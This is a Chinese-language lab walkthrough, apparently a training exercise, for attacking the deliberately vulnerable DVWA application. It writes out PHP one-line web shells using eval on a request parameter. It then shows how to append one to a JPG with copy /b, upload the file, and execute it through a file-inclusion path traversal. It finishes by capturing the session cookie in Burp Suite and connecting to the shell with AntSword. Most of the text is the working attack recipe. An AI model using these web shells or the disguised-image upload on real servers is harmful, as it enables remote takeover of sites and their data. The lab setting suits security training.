首先在自己新建一个实训文件夹下放一张储存很小的照片,
在创建一个shell.php的后门文件内容为:
<?php eval($_POST["cmd"]); ?>
<?php eval($_GET["cmd"]); ?>
<?php eval($_POST["cmd"]); ?>
然后在url中清空后输入cmd, 打开cmd.exe;输入copy motuo.jpg/b+shell.php mnv.jpg 将图片和shell.php文件一起生成二进制的图片文本格式。 然后用记事本格式打开发现一句话木马在最后, 打开dvwa的网页登陆安全级别改到low。 上传小于100000KB的jpg的图片 然后File inclusion。打开file1.php。 修改成?http://127.0.0.1/shixun/DVWA-master/vulnerabilities/fi/?page=../../hackable/uploads/mnv.jpg 打开火狐进行拦截,打开brupsuit进行拦截 拦截后的页面如下。复制cookie的一行 打开蚁剑进行连接,在基础信息中复制http://192.168.224.6/shixun/DVWA-master/vulnerabilities/fi/?page=../../hackable/uploads/mnv.jpg 到URL地址 连接密码是cmd? 。 然后再请求信息中的name中复制Cookie;在Vlaue中复制security=low; PHPSESSID=3ps4ejpns1q2k8f8710rterrs4;在进行来连接。 点击测试连接,连接成功,再次点击添加 双击打开按以下步骤进行操作 |